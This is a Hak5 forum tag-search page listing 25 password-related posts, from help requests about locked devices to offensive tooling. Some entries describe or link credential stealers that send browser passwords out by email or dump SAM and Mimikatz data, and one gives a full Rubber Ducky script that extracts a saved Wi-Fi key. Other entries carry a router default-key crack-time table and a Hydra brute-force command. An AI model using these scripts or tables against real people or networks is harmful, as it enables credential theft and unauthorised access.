Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'password'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Packet Squirrel
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 25 results

  1. OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE ************************************************************************************ I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. ************************************************************************************* HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want receive the goods :) __________________________________________________________ 1.$url = 'https://1fichier.com/?xxxxxxxxx- Pass Stealer Software 2.$url = 'https://1fichier.com/?xxxxxxxxx - sendEmail Client *** You can change this with every similar software __________________________________________________________ See u.. https://www.ducktoolkit.com/viewscript/59967fc4ac04af7d6d57dc54/ I Appreciated all comment or rebuild. Thanks
  2. Hey guys I'm new to the USB rubber ducky and have some questions. I want to try and make some payloads for chromebooks due to their wide use everywhere. Will that work? The password stealing payload was cool but it doesn't work due to the chrome update. I have a work around but it takes a little longer, involves going to chrome web store, installing "show password" extension, showing password, copying it, etc. Is that even possible to do with the USB rubber ducky? Where do I start? Thanks
  3. Wpa security

    Hi, Anyone know a attack for WPA TKIP attack like, the famous wep recover key (I have a bad English so I will write the same in spanish), I mean, not a social engineering attack or brute force hash attack. Exploiting this vulnerability " http://mobile.wi-fiplanet.com/news/article.php/3784251/WPA-Vulnerability-Discovered.htm ". Hola, primero discúlpenme el inglés, no es mi idioma materno. quería saber si alguien sabe como explotar la vulnerabilidad de las claves WPA descritas en el hipervinculo, un ataque similar al wep para recuperar las claves. Gracias de antemano.
  4. Best Password Manager?

    For around a year I've been using Dashlane's Premium tier however my subscription has recently run out and before I spend another $40 I want to be sure there are no better alternatives. I was looking at Lastpass as a replacement but with the upcoming acquisition by Citrix, I'm not to keen on what they might be planning for the service. I am keen on open source software and tend to use them whenever possible but in all honesty, I want to hear your experiences with the different software options available. For me I consider syncing between devices quite important however I understand this usually comes with a cost and it's normally only available on proprietary software so I am happy to sacrifice this for open and free alternatives. Cheers!

    When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny ( with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  6. DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  7. Hey, I ordered the beautiful USB rubber ducky and its working flawlessly. On windows its easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how thats possible on windows, i dont see why it should be possible on mac. I want to be able to find a passord on a mac computer, on safari, chrome or firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed dropbox and my computer automatically logs in to the dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work ill try my look on the wifi pineapple nano, just got it today. :D Thank you guys!
  8. Hi everyone, Lazagne project First I tried to run this exe lazagne.exe on my desktop and i see in 2-3 seconds all my passwords from browsers and also hashes. So i choose to use this exe on my rubber ducky but nothing happened. I joined the script you can download it. First i tried to run it without saving the results but in the beginning i will be happy to run it. Secondly save the results on the usb will be great. Thanks for the help in advance. LAZAGNE USB.txt
  9. Root password reset

    Is there a way to reset the root password without logging in.
  10. Hi, My friend got their facebook and twitter account hacked. Do any members know if it's possible to find out 1) who could have done it? (unlikely I know) 2) location of the hack? (if Q1 is unlikely, at least by narrowing the location of the compromise can help narrow down who did it). TIA : )
  11. Full external drive encryption

    Hi, just throwing out an idea about making a little video about encrypting external drives with key/usb, which preferably works cross-platform.
  12. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU. For WPA2 with the GTX 970, my benchmarks with hashcat are; 13,774,031,184 password hashes per day 573,917,966 per hour 9,565,299 per minute 159,421 per second Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list. For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info! SSID Length Password Format Combinations Time 2WIREXXX 10 0-9 10,000,000,000 17 hrs 3MobileWiFi 8 0-9 a-z 2,821,109,907,456 7 mth 3Wireless-Modem-XXXX 8 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) 65,536 1 sec Alice_XXXXXXXX 24 0-9 a-z 22,452,257,707,354,557,240,087,211,123,792,674,816 Never AOLBB-XXXXXX 8 0-9 A-Z 2,821,109,907,456 7 mth ATT### 10 0-9 10,000,000,000 17 hrs ATTxxxx 0000 10 0-9 A-Z 3,656,158,440,062,976 Never ATTxxxxxxx 12 a-z + symbols 1,449,225,352,009,601,191,936 Never belkin.xxx 8 2-9 a-f 1,475,789,056 2.5 hrs belkin.xxxx 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin.XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin_XXXXXX 8 0-9 A-F 4,294,967,296 7.5 hrs BigPondXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth BOLT!SUPER 4G-XXXX 8 4 numbers + Last 4 of SSID 65,536 1 sec BrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. BTHomeHub(1)-XXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth BTHomeHub2-XXXX 10 2-9 a-f 289,254,654,976 3 wks BTHub3 10 2-9 a-f 289,254,654,976 3 wks BTHub4 10 2-9 a-f 289,254,654,976 3 wks BTHub5 10 2-9 a-f 289,254,654,976 3 wks BTHub6 10, 12 0-9 a-z A-Z 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 Never CenturyLinkXXXX 14 0-9 a-f 72,057,594,037,927,936 Never Cisco 26 0-9 a-f 43,608,742,899,428,874,059,776 Never Digicom_XXXX 8 0-9 A-Z 2,821,109,907,456 7 mth DJAWEB_##### 10 0-9 10,000,000,000 17 hrs Domino-XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs E583x-xxxx 8 0-9 10,000,000 1 min E583x-xxxxx 8 0-9 A-F 4,294,967,296 7.5 hrs EasyBox 904 LTE 9 0-9 a-z A-Z 13,537,086,546,263,552 Never EasyBox-###### 9 0-9 A-F 68,719,476,736 5 days EEBrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. FRITZ!Box Fon WLAN #### 16 0-9 10,000,000,000,000,000 Never FrontierXXXX 10 0-9 10,000,000,000 17 hrs Hitron 12 0-9 A-Z (sometimes use the device’s serial number as the default key!) 4,738,381,338,321,616,896 Never INFINITUM#### 10 0-9 10,000,000,000 17 hrs iPhone 5 ? Lowercase word plus 4 numbers 172000^65,536 Need dict. Keenetic-XXXX 8 0-9 a-z A-Z 218,340,105,584,896 Never Linkem_XXXXXX 8 0-9 10,000,000 1 min Livebox-XXXX ? ? mifi2 13 0-9 A-Z 170,581,728,179,578,208,256 Never MobileWifi-xxxx 8 0-9 10,000,000 1 min MYWIFI (EE) - MYWIFI + 4 numbers 65,536 1 sec NETGEARXX - Adjective + Noun + 3 numbers Need dict. Netia-XXXXXX 13 0-9 a-f 4,503,599,627,370,496 Never ONOXXXX 10 0-9 10,000,000,000 17 hrs Orange-0a0aa0 8 0-9 a-f 4,294,967,296 7.5 hrs Orange-AA0A00 12 0-9 A-F 281,474,976,710,656 Never Orange-XXXX 8 2345679 ACEF 214,358,881 23 mins PLDT - PLDTWIFI + Last 5 digits of router MAC 1 1 sec Plusnet Broadband UK 64 a-z A-Z 0-9 - Never PlusnetWireless-XXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth PLUSNET-XXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Sitecom_XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs SKYXXXXX 8 A-Z http://www.ph-mb.com/products/sky-calc 208,827,064,576 2 wks SpeedTouchXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TALKTALK-XXXXXX 8 346789 A-Z (bar ILOSZ) 282,429,536,481 3 wks TDC-#### 9 0-9 a-f 68,719,476,736 5 days Tech_XXXXXXXX 8 A-Z 208,827,064,576 15 days Technicolor-Router 10 0-9 A-F 1,099,511,627,776 2.5 mth Telecom-XXXXXXXX ? ? TelstraXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TELUSXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Thomson 10 0-9 A-F 1,099,511,627,776 2.5 mth ThomsonXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TIM_PN51T_XXXX 8 0-9 WPS PIN is 12345670 10,000,000 1 min TNCAP-XXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TNCAPXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TP-LINK_###### 8 0-9 0-9 A-F 10,000,000 1 min TRENDnet TEW-123ABC 11 First 3 digits in SSID (123 here) + 8 digits https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries 2,821,109,907,456 7 mth TRKASHI-###### 8 2 numbers, 6 digits (10^2)^(26^6) Need dict. UNITE-XXXX 8 0-9 10,000,000 1 min UPCXXXXXXX 8 A-Z 208,827,064,576 15 days Verizon MIFIXXXX XXXX 11 0-9 100,000,000,000 7.5 days virginmediaXXXXXX 8 a-z (bar iol) 78,310,985,281 6 days VirginMobile MiFiXXXX XXX 11 0-9 100,000,000,000 7.5 days VMXXXXXXX 12 0-9 a-z A-Z 3,226,266,762,397,899,821,056 Never VMXXXXXXX-2G 8 a-z (bar iol) 78,310,985,281 6 days VMXXXXXXX-5G 8 a-z (bar iol) 78,310,985,281 6 days Vodaphone_XXXXXXXX 15 0-9 a-z 221,073,919,720,733,357,899,776 Never WLAN1-XXXXXX 11 0-9 A-F 17,592,186,044,416 Never ZyXELXXXXXX 13 10 0-9 A-Z 0-9 A-F 1,099,511,627,776 2.5 mth Please inform me of any inaccuracies or additional data you feel could be added. Enjoy! *edit* My sources are my own personal experiences, plus; http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/ https://scotthelme.co.uk/ee-brightbox-router-hacked/ https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959 https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  13. I have created a new usb rubber ducky script which can steal chrome passwords in the blink of an eye. to see the code goto my github page. github: https://github.com/Nuk3leus/Ducky-chrome-password-stealer any contribution to improve this script would be great. post on this forum or email me at Nuk3leus@gmail.com
  14. Hello, I’m trying to get THC-Hydra working on a website form which doesn’t require a username but hydra wants me to specify it with either –l, –L or -C. The form field in question needs the following parameters, as far as I’ve found out using Burp Suite Free Edition: password=test&do_login=yes&Submit=Log+in I’m also not sure what service to use and what success or failure message the server sends (Burp Suite doesn't show it and the website doesn't display any message - it just refreshes and shows the same page), currently I’ve tried http-form-post with the following parameters hydra –t 5 –L users.txt –f –x 2:6:a www.<url>.com http-form-post “/protected:password=^PASS^:S=success” (Note that I’ve specified, with –L users.txt, a username file but this is not required by the website’s form field) The website’s form can be found under www.<url>.com/protected, how do I tell hydra to target the /protected page, and no only the www.<url>.com part? What can I do? Any ideas?
  15. Greetings! I really hope this isn't a silly question. I was talking with my friend about the NANO and how it can deauth clients on a network, then convince those clients to connect to the NANO as a rogue access point. I realize that it is not difficult to capture and rebroadcast SSIDs, but they are always open access points. If I wanted to capture the WPA or WPA2 handshake, is there a way to either log it and send it to another machine to be cracked, or just grab whatever information the device sends to the NANO, and use that to create a copy of the original SSID complete with its password? Basically, what I am trying to figure out is if the NANO can capture data that will assist in knowing the password to a particular network. I am still learning how handshakes, frames, and beacons work, and although I have a basic understanding, I am not sure if this is feasible or not. I know WPA and WPA2 passwords are hard to crack, but would it help if the device connecting to the rogue AP tried to give that rogue AP its part of that handshake? Would it be easier (or even feasible) to just go into that client system and take whatever the saved password is and store it for future use? Any clarity or resources on this subject would be appreciated. Cheers, Dez
  16. netgear GS752TP woe

    I have been hired into a new company. one task I have been challenged with is to discover the password for a netgear GS752TP switch we have, but i cannot wipe the switch yet. this is because no one has documentation on this switch, and they don't have VLAN information on it (this switch will be removed from PROD once i can audit it). is there a way to 'discover' the password, or otherwise reset it like you can with Cisco switches?
  17. Regarding password statistics and differences between demographics, have a little shufti at these. Good read. https://www.unix-ninja.com/p/Password_DNA https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvUGFzc3dvcmQgRE5BIEFwcGVuZGl4IG9mIENvbXBpbGVkIERhdGEucGRm And a free wordlist, compiled from the list used to create these statistics (looks half decent); https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvZG5hLmRpY3Q
  18. Forgot password Lanturtle

    I have forgotten my password to my Lanturtle (you dont have to say anything). What can i do to reset my password or the device?
  19. **This is my mod to the original by Siem. I changed it to save to the SD card while running twin duck software. I used code from different sources and compiled it as I am still learning. REM Title: WiFi password grabber save to twin duck SD REM Author: silent_noise REM Original by: Siem REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck REM requires Twin Duck firmware and SD card to be named "DUCKY" REM Adjust time for driver install DELAY 3000 REM Minimize all windows WINDOWS d REM Open cmd & bypass UAC DELAY 500 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 600 REM Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 100 REM Getting SSID STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A ENTER REM Creating A.txt STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER REM Get network type STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A ENTER REM Get authentication STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A ENTER REM Get password STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A ENTER REM Delete A.txt STRING del A.txt ENTER REM Create Log.txt STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER DELAY 100 REM Send Log.txt to sd card STRING copy Log.txt %duck%\%computername%-wifi-passwords.txt ENTER DELAY 500 REM Delete Log.txt and exit STRING del Log.txt & exit ENTER
  20. Windows Vista Password Recovery

    Hey, a friend of mine bought an older computer from his employer than is running Vista Home Premium, but his employer has forgotten the administrator password and has no password recovery disk. So my friend hired me to break into it. I'm having problems though. I've tried using OPHCrack on a live disk, but for some reason it can't find the password. Anyone have any ideas?
  21. [HELP] trml cmd to ask pw @ login

    i went into "user setings" and changed "asded at login" to " not asded on login". now i cant sign in. it does not give me the option to enter a password just says login, but playes the incorect pw sound when i try i can get into the guest account but that does me no good case su and sudo dont work i can ctrl alt f1 and login to the user there i tried sudo visudo and changed the line to read NOPASSWD:ALL but that did not work anyone know how i can chage back the user settings to ask for password at login from terminal?
  22. Ophcrack problem

    Hey there, So I was cleaning my pc by going back to the original state and when finished I created a new password. However I was a bit drunk and probably misspelled it. However after many tries I gave up and searched for other solutions. This lead me to Ophcrack which I downloaded on a DVD and tried to run. But it gave an error about not finding the requested table(s). Now after a lot of tries with other programs and bootable USB's etc. it just won't work. Can anybody help me with this issue? I've got an Windows 7 64x OS. Starting script: ophcrack-launcher.sh Searching tables in: /media/sdc1/tables Tables found: /media/sdc/tables/vista_free/table0.bin List of Windows partitions containing hashes: 0. /media/sda2/WINDOWS/System32/config 1. /media/sda4/Windows/System32/config Select the partition to crack: 0 Starting Ophcrack 4 hashes have been found in the encrypted SAM found in /media/sda2/WINDOWS/System32/config/. Did not find the requested table(s) /media/sdc1/tables/vista_free/table0.bin. The passwords have been saved in /tmp/ophcrack.txt Press ENTER to continue... My console log Hope somebody can help me! If you need more information ask me! Regards, Rover PS. English is not my foreign language and i've typed the console log so there may be type mistakes.
  23. Cruch Usage

    hey guys, I was hoping anyone could help me out with creating a wordlist how i desire with crunch. eg- usr1pass1, usr2pass2, usr3pass3......usr99pass99
  24. How Do I Sniff For Passwords

    Hi, how would I sniff https passwords using the nano? I had a mark 4 a while back and I didnt have much success. Also, how would I get the client to connect to the pineapple if they are already connected to a network. Thanks!
  25. LAN Turtle

    I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule